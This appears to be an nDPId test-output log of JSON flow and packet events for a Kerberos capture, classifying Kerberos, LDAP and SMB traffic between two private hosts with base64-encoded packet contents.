00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951630,"flow_last_seen":1549337951631,"flow_idle_time":7440000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":475,"flow_avg_l4_payload_len":237,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49187,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951638,"flow_last_seen":1549337951638,"flow_idle_time":7440000,"flow_min_l4_payload_len":162,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":477,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49188,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00705{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951639,"flow_last_seen":1549337951639,"flow_idle_time":7440000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49189,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}}
00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951639,"flow_last_seen":1549337951639,"flow_idle_time":7440000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49189,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00708{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951709,"flow_last_seen":1549337951710,"flow_idle_time":7440000,"flow_min_l4_payload_len":190,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":407,"flow_avg_l4_payload_len":203,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49190,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}}
00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951709,"flow_last_seen":1549337951710,"flow_idle_time":7440000,"flow_min_l4_payload_len":190,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":407,"flow_avg_l4_payload_len":203,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49190,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00708{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952265,"flow_last_seen":1549337952266,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":380,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49192,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}}
00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952265,"flow_last_seen":1549337952266,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":380,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49192,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00708{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952280,"flow_last_seen":1549337952281,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":380,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49195,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}}
00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952280,"flow_last_seen":1549337952281,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":380,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49195,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00704{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952282,"flow_last_seen":1549337952282,"flow_idle_time":7440000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":83,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49196,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}}
00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952282,"flow_last_seen":1549337952282,"flow_idle_time":7440000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":83,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49196,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929983,"flow_last_seen":1549337929983,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":476,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49161,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}}
00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929983,"flow_last_seen":1549337929983,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":476,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49161,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931189,"flow_last_seen":1549337931190,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":242,"flow_tot_l4_payload_len":452,"flow_avg_l4_payload_len":226,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49169,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}}
00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931189,"flow_last_seen":1549337931190,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":242,"flow_tot_l4_payload_len":452,"flow_avg_l4_payload_len":226,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49169,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931211,"flow_last_seen":1549337931213,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":242,"flow_tot_l4_payload_len":452,"flow_avg_l4_payload_len":226,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49172,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}}
00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931211,"flow_last_seen":1549337931213,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":242,"flow_tot_l4_payload_len":452,"flow_avg_l4_payload_len":226,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49172,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937690,"flow_last_seen":1549337937691,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":476,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49179,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}}
00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937690,"flow_last_seen":1549337937691,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":476,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49179,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937700,"flow_last_seen":1549337937701,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":476,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49180,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}}
00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937700,"flow_last_seen":1549337937701,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":476,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49180,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952267,"flow_last_seen":1549337952267,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":524,"flow_avg_l4_payload_len":262,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49191,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}}
00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952267,"flow_last_seen":1549337952267,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":524,"flow_avg_l4_payload_len":262,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49191,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952273,"flow_last_seen":1549337952274,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":330,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":270,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49193,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}}
00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952273,"flow_last_seen":1549337952274,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":330,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":270,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49193,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929817,"flow_last_seen":1549337929818,"flow_idle_time":7440000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":487,"flow_avg_l4_payload_len":243,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49156,"dst_port":445,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMBv23","breed":"Acceptable","category":"System"}}
00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929817,"flow_last_seen":1549337929818,"flow_idle_time":7440000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":487,"flow_avg_l4_payload_len":243,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49156,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931220,"flow_last_seen":1549337931221,"flow_idle_time":7440000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":487,"flow_avg_l4_payload_len":243,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49174,"dst_port":445,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMBv23","breed":"Acceptable","category":"System"}}
00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931220,"flow_last_seen":1549337931221,"flow_idle_time":7440000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":487,"flow_avg_l4_payload_len":243,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49174,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952282,"flow_last_seen":1549337952283,"flow_idle_time":7440000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":356,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":308,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49194,"dst_port":445,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMBv23","breed":"Acceptable","category":"System"}}
00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952282,"flow_last_seen":1549337952283,"flow_idle_time":7440000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":356,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":308,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49194,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929790,"flow_last_seen":1549337929790,"flow_idle_time":7560000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"thread_ts_msec":1549337929790,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49157,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00774{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1549337929790,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":293,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":293,"pkt_l4_len":259,"thread_ts_msec":1549337929790,"pkt":"pB9ywglqAAgCHEeuCABFAAEXABdAAIAGkNisEAjJrBAICMAFAFiynbRHbznTnlAYAQAf5QAAAAAA62qB6DCB5aEDAgEFogMCAQqjFTATMBGhBAICAICiCQQHMAWgAwEB\/6SBwTCBvqAHAwUAQIEAEKEYMBagAwIBAaEPMA0bC2pvaG5zb24tcGMkohAbDmhhcHB5Y3JhZnQub3JnoyMwIaADAgECoRowGBsGa3JidGd0Gw5oYXBweWNyYWZ0Lm9yZ6URGA8yMDM3MDkxMzAyNDgwNVqmERgPMjAzNzA5MTMwMjQ4MDVapwYCBE7AFheoFTATAgESAgERAgEXAgEYAgL\/eQIBA6kdMBswGaADAgEUoRIEEEpPSE5TT04tUEMgICAgICA="}
00721{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929790,"flow_last_seen":1549337929790,"flow_idle_time":7560000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"thread_ts_msec":1549337929790,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49157,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}}
00824{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1549337929790,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":332,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":332,"pkt_l4_len":298,"thread_ts_msec":1549337929790,"pkt":"AAgCHEeupB9ywglqCABFAAE+ExRAAIAGfbSsEAgIrBAIyQBYwAVvOdOesp21NlAYAQCkkQAAAAABEn6CAQ4wggEKoAMCAQWhAwIBHqQRGA8yMDE5MDIwNTAzMzg0OFqlBQIDBjUgpgMCARmpEBsOaGFwcHljcmFmdC5vcmeqIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDmhhcHB5Y3JhZnQub3JnrIGnBIGkMIGhMH6hAwIBE6J3BHUwczA0oAMCARKhLRsrSEFQUFlDUkFGVC5PUkdob3N0am9obnNvbi1wYy5oYXBweWNyYWZ0Lm9yZzAFoAMCARcwNKADAgEDoS0bK0hBUFBZQ1JBRlQuT1JHaG9zdGpvaG5zb24tcGMuaGFwcHljcmFmdC5vcmcwCaEDAgECogIEADAJoQMCARCiAgQAMAmhAwIBD6ICBAA="}
00729{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929790,"flow_last_seen":1549337929790,"flow_idle_time":7560000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1549337929790,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49157,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}}
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929811,"flow_last_seen":1549337929811,"flow_idle_time":7560000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"thread_ts_msec":1549337929811,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49158,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00882{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1549337929811,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1549337929811,"pkt":"pB9ywglqAAgCHEeuCABFAAFnABtAAIAGkISsEAjJrBAICMAGAFganBtaQ2U1slAYAQDaGgAAAAABO2qCATcwggEzoQMCAQWiAwIBCqNjMGEwTKEDAgECokUEQzBBoAMCARKiOgQ4YERcga5zFfjuo7+oqo0hJ6Udj7efOwOKKYJj6PKpxuETgzDcdt27IvGW9sEQ18QPUV\/drVuLVBwwEaEEAgIAgKIJBAcwBaADAQH\/pIHBMIG+oAcDBQBAgQAQoRgwFqADAgEBoQ8wDRsLam9obnNvbi1wYySiEBsOaGFwcHljcmFmdC5vcmejIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDmhhcHB5Y3JhZnQub3JnpREYDzIwMzcwOTEzMDI0ODA1WqYRGA8yMDM3MDkxMzAyNDgwNVqnBgIETsAWF6gVMBMCARICARECARcCARgCAv95AgEDqR0wGzAZoAMCARShEgQQSk9ITlNPTi1QQyAgICAgIA=="}
00721{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929811,"flow_last_seen":1549337929811,"flow_idle_time":7560000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"thread_ts_msec":1549337929811,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49158,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}}
00610{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1549337929812,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":1549337929812,"pkt":"AAgCHEeupB9ywglqCABFAACYExlAAIAGflWsEAgIrBAIyQBYwAZDZTtmGpwcmVAYAQDnsgAAX5hri3Z\/opje40K53kwDKo2\/CTegm0pJkWpLVNFlnn\/MakUFXqKHv4CDtH2CbQqvJq\/ecJgxH2EwrzVmUcQk2zqXXjIwbkyszZ9\/Xc6IEgQ4qiI64lPzINS7ueVTbdUXk\/8v52QxoGdMilBjjWTAcQ=="}
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929815,"flow_last_seen":1549337929815,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1549337929815,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49159,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
